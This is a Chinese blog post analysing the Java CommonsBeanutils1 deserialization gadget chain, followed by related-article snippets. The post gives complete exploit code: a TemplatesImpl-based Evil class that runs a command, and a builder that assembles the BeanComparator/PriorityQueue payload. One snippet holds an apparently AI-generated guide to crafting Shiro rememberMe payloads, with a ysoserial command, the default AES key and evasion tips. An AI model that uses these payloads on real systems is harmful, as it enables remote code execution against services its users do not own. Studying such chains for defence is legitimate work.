CommonsBeanutils1反序列化链分析

最新推荐文章于 2025-03-30 09:24:44 发布
最新推荐文章于 2025-03-30 09:24:44 发布
阅读量1k 收藏
点赞数
分类专栏: 代码审计 java安全 文章标签: java 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_53264525/article/details/121723172
版权

CommonsBeanutils1反序列化链分析

ACC2链中用到PriorityQueue类的比较器进行构造反序列化链,当时用到的是TransformingComparator对象作为PriorityQueue类的比较器,那么是否存在其它比较器可以用来构造反序列化链呢?

答案肯定是有的,BeanComparator对象就可以作为比较器用于构造反序列化链

Apache Commons Beanutils简介

Apache Commons Beanutils是 Apache Commons工具集中的另一个项目,它提供对 javaBean 的一些操作,javaBean的用于映射数据库的。比如如下一个javaBean就映射了数据库的一个Studnet表,表里面存在name和age字段

package org.apache.shiro.test;

public class Student {
    private String name;
    private int age;

    public String getName() {
        return name;
    }
    public void setName(String name) {
        this.name = name;
    }
    public int getAge() {
        return age;
    }
    public void setAge(int age) {
        this.age = age;
    }
}

Apache Commons Beanutils提供对 javaBean 的一些操作,比如当PropertyUtils.getProperty(new Student,name)方法时,会去调用Student类的getName方法。

BeanComparator对象

这个对象位于org.apache.commons.beanutils这个包下,其实现了Comparator和Serializable接口,所以它可以用作PriorityQueue的比较器,如下为BeanComparator.compare方法

public int compare(Object o1, Object o2) {
    if (this.property == null) {
        return this.comparator.compare(o1, o2);
    } else {
        try {
            Object value1 = PropertyUtils.getProperty(o1, this.property);
            Object value2 = PropertyUtils.getProperty(o2, this.property);
            return this.comparator.compare(value1, value2);
        } catch (IllegalAccessException var5) {
            throw new RuntimeException("IllegalAccessException: " + var5.toString());
        } catch (InvocationTargetException var6) {
            throw new RuntimeException("InvocationTargetException: " + var6.toString());
        } catch (NoSuchMethodException var7) {
            throw new RuntimeException("NoSuchMethodException: " + var7.toString());
        }
    }
}

this.property为空则直接比较两个元素,当不为空则调用PropertyUtils.getProperty方法,当o1为对象A,this.property为name,则此时PropertyUtils.getProperty方法会调用A.getName方法,那么这个点怎么利用呢?

构造payload

前面分析ACC链的时候有一条TemplatesImpl.getOutputProperties->TemplatesImpl.newTransformer->TemplatesImpl.getTransletInstance->TemplatesImpl.defineTransletClasses调用链,且getOutputProperties和newTransformer方法是公开的。注意到getOutputProperties方法,不就是符合PropertyUtils.getProperty方法的调用格式吗?当this.property为outputProperties(注意要小写才行),o1为TemplatesImpl时,则会调用TemplatesImpl.getOutputProperties进入反序列化调用链。

根据前面的分析,可以利用BeanComparator对象作为PriorityQueue的比较器进行构造反序列化链,完整payload如下

Evil.java文件

package org.apache.shiro.test;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.IOException;

public class Evil extends AbstractTranslet {
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { }
    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { }
    public Evil() throws IOException {
        Runtime.getRuntime().exec("calc.exe");
    }
}

PayloadDemo03.java文件

package org.apache.shiro.test;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.beanutils.BeanComparator;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.PriorityQueue;

public class PayloadDemo03 {
    public static void main(String[] args) throws Exception {
        PriorityQueue priorityQueue = (PriorityQueue) getObject();
        serAndUnser(priorityQueue);
    }

    public static Object getObject() throws Exception{
        ClassPool pool = ClassPool.getDefault();
        CtClass clazz = pool.get(org.apache.shiro.test.Evil.class.getName());
        byte[] bytes = clazz.toBytecode();
        TemplatesImpl Evilobj = new TemplatesImpl();
        BeanComparator comparator = new BeanComparator();
        PriorityQueue priorityQueue = new PriorityQueue(2,comparator);
        priorityQueue.add(1);
        priorityQueue.add(1);
        Field declaredField = Evilobj.getClass().getDeclaredField("_bytecodes");
        declaredField.setAccessible(true);
        setField(Evilobj,"_bytecodes",new byte[][]{bytes});
        setField(Evilobj,"_name","ky");
        setField(Evilobj,"_tfactory",new TransformerFactoryImpl());
        setField(comparator,"property","outputProperties");  //需要首字母小写
        setField(priorityQueue,"queue",new Object[]{Evilobj,Evilobj});
        return priorityQueue;
    }
    public static void setField(Object obj,String field,Object value) throws Exception{
        Field declaredField = obj.getClass().getDeclaredField(field);
        declaredField.setAccessible(true);
        declaredField.set(obj,value);
    }
    public static void serAndUnser(Object obj) throws Exception{
        ByteArrayOutputStream bo = new ByteArrayOutputStream();
        ObjectOutputStream oo = new ObjectOutputStream(bo);
        oo.writeObject(obj);
        oo.flush();
        oo.close();
        ByteArrayInputStream bi = new ByteArrayInputStream(bo.toByteArray());
        ObjectInputStream oi = new ObjectInputStream(bi);
        Object o = (Object) oi.readObject();
    }
}

自此,CommonsBeanutils1反序列化链就构造完毕了。

Java反序列化(十)CommonsBeanutils分析及Shiro中的利用
Vicl1fe的博客
10-20 558
前言 Apache Commons Beanutils Apache Common Beanutils是Apache Common工具集下的另一个项目,提供了一系列对JavaBean的操作方法。什么是JavaBean:什么是JavaBean。 如下Cat就是一个JavaBean。 final public class Cat { private String name = "catalina"; public String getName() { return name;
Java反序列化和JNDI注入漏洞案例实战
悦分享
08-04 1212
CORBA全称(Common ObjectRequest Broker Architecture)也就是公共对象请求代理体系结构,是OMG(对象管理组织,一个非盈利性的计算机行业标准协会)制定的一种标准的面向对象应用程序体系规范。其提出是为了解决不同应用程序间的通信,曾是分布式计算的主流技术。CORBA标准主要分为三个部分,IDL(接口语言)、ORB(对象请求代理)、IIOP(ORB之间的操作协议)。其结构主要分为三部分:naming service、client side、servant side。...
CommonsBeanutils1反序列化链在Shiro中的利用
12-04 1076
CommonsBeanutils1反序列化链在Shiro中的利用 前面分析Shiro550的时候,利用的是commons-collections进行构造反序列化链,但是commons-collections是我们手动加进去的,如果Shiro没有commons-collections链呢,这时候该怎么办?这时候CommonsBeanutils1反序列化链就派上用场了! Shiro是默认依赖Commons-Beanutils1.8.3的,那么就可以利用CommonsBeanutils1反序列化链进行构造pa
Java反序列化-CommonsBeanUtils 1链分析
永远都没有了
05-10 1472
这条链子是一个比较重要的链子,后续的shiro框架漏洞都会用到。打链子,需要注意对应的依赖去打
JAVA反序列化深入学习(十):CommonsBeanutils1
最新发布
Neolock的博客
03-30 1086
由 TransformingComparator 触发 ChainedTransformer ,从而实例化 TemplatesImpl 那能不能找到一个 Comparator,绕过中间复杂过程,直接实例化 TemplatesImpl 呢? 于是有了 CommonsBeanutils 这条链
[Java反序列化]Java-CommonsBeanutils1利用链分析
Y4tacker的博客
07-28 839
文章目录反序列化调用链Java-CommonsBeanutils1利用链分析参考文章 反序列化调用链 ObjectInputStream.readObject() PriorityQueue.readObject() PriorityQueue.heapify() PriorityQueue.siftDown() siftDownUsingComparator() BeanComparator.compare() TemplatesImpl.getOutputPro
学习使用Commons 之 BeanUtils(1)- -
weixin_33726313的博客
12-14 126
学习使用Commons 之 BeanUtils(1)- -                                        jakarta的Commons被许多项目所引用,里面有许多很实用的工具类,如果不熟悉他们,怎么能够会更灵活的使用spring ...
Java反序列化之commons-beanutils分析
weixin_34066347的博客
11-17 1049
TemplatesImpl类是一个可序列化的类,其中有一个属性_bytecodes,里面保存的数据在defineTransletClasses函数里将会被加载成类: 存在着这样一条调用链条: 简单来说,只要是能调用到getOutputProperties函数,就能触发包含在_bytecodes里的类构造函数被执行(这个类是由攻击者来实现的)。 Paylo...
Java反序列化之Commons-Beanutils1链与无 commons-collections的Shiro反序列化利用
weixin_45682070的博客
02-11 1646
Apache Commons Beanutils 首先看一下 Commons Beanutils包,Apache Commons Beanutils 是 Apache Commons 工具集下的另一个项目,它提供了对普通Java类对象(也称为JavaBean)的一些操作方法。 JavaBean可以简单的理解为一个Java类对象。 commons-beanutils中提供了一个静态方法 PropertyUtils.getProperty ,让使用者可以直接调用任意JavaBean的getter方法,看面的de
shrio反序列化分析
hongduilanjun的博客
03-18 1258
shiro550 环境搭建 https://codeload.github.com/apache/shiro/zip/shiro-root-1.2.4 配置pom.xml <dependencies> <dependency> <groupId>javax.servlet</groupId> <artifactId>jstl</artifactId> <scope>ru
java安全】CommonsBeanUtils1
leekos的博客,分享web安全相关知识~
08-02 1321
在之前我们学习了,它是java中的一个优先队列,队列的每个元素都有优先级,在反序列化这个对象的时候,为了保证队列顺序,会将队列中的元素进行排序,从而调用了接口的compare()方法,进而执行恶意反序列化操作我们能不能找到除了之前提到的类以外的其他可以利用的对象?我们需要了解一下。
commons-beanutils-1.9.1解析javaBean方式
05-17
Beanutils用了魔术般的反射技术,实现了很多夸张有用的功能,都是C/C++时代不敢想的。无论谁的项目,始终一天都会用得上它。我算是后知后觉了,第一回看到它的时候居然错过。 1.属性的动态getter,setter 2.beanCompartor 动态排序 3.Converter 把Request或ResultSet中的字符串绑定到对象的属性 4.1 PropertyUtils,当属性为Collection,Map时的动态读取 4.2 PropertyUtils,获取属性的Class类型 4.3 ConstructorUtils,动态创建对象 4.4 MethodUtils,动态调用方法 4.5 动态Bean 见用DynaBean减除不必要的VO和FormBean
commons-beanutils-1.9.3
10-27
BeanUtils工具由Apache软件基金组织编写,提供给我们使用,主要解决的问题是:把对象的属性数据封装到对象中。在整个J2EE的编程过程中,我们经常会从各种配置文件中读取相应的数据,需要明白的一点是从配置文件中读取到的数据都是String,但是很显然我们的应用程序中不仅仅有String一种数据类型,比如:基本数据类型(int、double、char、float等),还有自定义数据类型(引用数据类型),那么我们必须面临的一个问题就是讲字符串类型转换为各种具体的数据类型,就是用beanutils工具
Apache-commons.BeanUtils浅析
weixin_30552811的博客
05-29 126
BeanUtils:通过反射控制JavaBean属性的实用方法。 1.cloneBean(Object) Object 克隆一个bean是基于可用属性的get和set方法,即使这个bean类没有实现Cloneable接口方法的实现是有BeanUtilBean的newbean = bean.getClass().newInstance();对newbean的...
Java反序列化漏洞——CommonsBeanutils1链分析
Thunderclap的博客
02-20 1924
在创建类的对象的时候可以为comparator赋予特定的比较器,值得注意的是如果没有设定自定义的comparator,其默认为ComparableComparator对象,当然,在调用链中,将会调用他的compare方法。接收两个参数 bean (类对象)和 name(属性名),方法会返回这个类的这个属性的值,但是他不是直接通过反射取值,而是通过反射调用getter方法获取属性,进而经过恶意的构造,我们可以触发任意的getter方法。getter方法以get开头,setter方法以set开头。
java--CommonsBeanutils1 学习
zyer
06-07 485
CommonsBeanutils1利用链学习
1:Commons BeanUtils组件简介
IT忍者神龟
07-02 813
我整理一下放到网上 最近没有时间,项目太忙了
[Java反序列化]CommonsBeanutils1利用链学习
feng的博客
08-29 1938
前言 继续反序列化的学习。 预备知识 之所以会提到CommonsBeanutils反序列化链,是因为shiro是依赖commons-beanutils的,当然这是接下来学习的东西的。 根据名字就知道,类似Commons-Collections是对集合的封装和补充,commons-beanutils是应用于javabean的工具。 至于什么是JavaBean,放一下维基百科的定义,很简单: 有一个public的无参数构造函数。 属性可以透过get、set、is(可替代get,用在布尔型属性上)方法或遵循特
shiro反序列化Payload产生的过程是
03-18
<think>嗯,用户想知道Shiro反序列化漏洞中Payload生成的过程,特别是构造方法和原理。首先,我需要回忆一下Shiro反序列化漏洞的基本知识。Shiro在记住我功能中使用加密的序列化数据,而攻击者可能利用弱密钥或已知密钥来构造恶意对象。 首先,Payload生成的关键步骤应该包括反序列化利用链、加密和编码。我记得Shiro550和721的区别,550是已知密钥,而721需要Padding Oracle攻击。用户的问题可能更关注Shiro550的情况,因为这是比较常见的。 接下来,构造Payload的过程大概分为几个阶段:生成恶意对象、序列化、加密(AES-CBC)、Base64编码。需要确保每一步都正确,比如选择正确的利用链,比如CommonsBeanutils或者JRMPClient,然后进行序列化。加密时要注意密钥是否正确,因为如果密钥不正确,Shiro解密会失败,无法触发反序列化。 可能还需要提到加密模式,比如AES-CBC和填充方式,这里可能会有Padding Oracle的问题,特别是在Shiro721中。不过用户的问题可能更侧重于生成Payload的构造方法,所以需要详细说明每一步的具体操作,比如如何用ysoserial生成Gadget,然后使用密钥加密,再进行Base64编码,最后设置到Cookie中。 同时,要引用提供的参考资料,比如引用[2]中的解密过程,以及引用[4]中的密钥碰撞问题。还要注意漏洞的影响版本,比如引用[1]提到的CVE-2022-32532,但用户的问题主要关于反序列化,所以可能需要区分不同的CVE。 最后,要确保回答结构清晰,分步骤解释,并生成相关问题。可能需要检查是否有遗漏的步骤,比如密钥获取的方式,或者不同利用链的选择。另外,要提醒用户实际测试需要合法授权,避免法律问题。</think>### Apache Shiro 反序列化漏洞 Payload 构造方法及原理 #### 一、漏洞背景 Apache Shiro 的反序列化漏洞(如 CVE-2016-4437/Shiro550)源于其“记住我”(RememberMe)功能的加密流程缺陷。攻击者通过构造恶意序列化数据,结合已知密钥或加密模式漏洞,可实现远程代码执行[^1][^2]。 #### 二、Payload 构造核心步骤 1. **利用链选择** 使用反序列化利用链(Gadget Chain)生成恶意对象,例如: - `CommonsBeanutils1`(依赖特定版本库) - `JRMPClient`(利用远程类加载) ```python # 示例:通过ysoserial工具生成Payload java -jar ysoserial.jar CommonsBeanutils1 "命令" > payload.bin ``` 2. **序列化与加密** Shiro 使用 AES-128-CBC 模式对序列化数据加密,需以下步骤: - **序列化**:将恶意对象转换为字节流 - **填充**:按 PKCS5/PKCS7 标准填充至块大小整数倍 - **加密**:使用硬编码或泄露的密钥加密 ```python # 伪代码:AES-CBC加密流程 iv = random(16 bytes) cipher = AES.new(key, AES.MODE_CBC, iv) ciphertext = cipher.encrypt(padded_data) ``` 3. **编码与传输** 加密后的数据通过 Base64 编码后植入 Cookie: ```python rememberMe = base64.b64encode(iv + ciphertext) ``` #### 三、关键原理分析 1. **密钥硬编码问题** Shiro 默认密钥 `kPH+bIxk5D2deZiIxcaaaA==` 公开,攻击者可碰撞其他弱密钥[^4]。 2. **加密模式缺陷** AES-CBC 模式若未正确校验填充,可能被用于 Padding Oracle 攻击(如 Shiro721)[^3]。 3. **反序列化触发点** Shiro 在反序列化前会解密数据并调用 `ObjectInputStream.readObject()`,导致恶意代码执行。 #### 四、防御规避技术 1. **密钥混淆**:利用多个密钥生成 Payload 尝试绕过 2. **流量伪装**:通过合法 Cookie 结构隐藏恶意 Payload 3. **利用链组合**:结合依赖库特性构造无回显攻击链
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值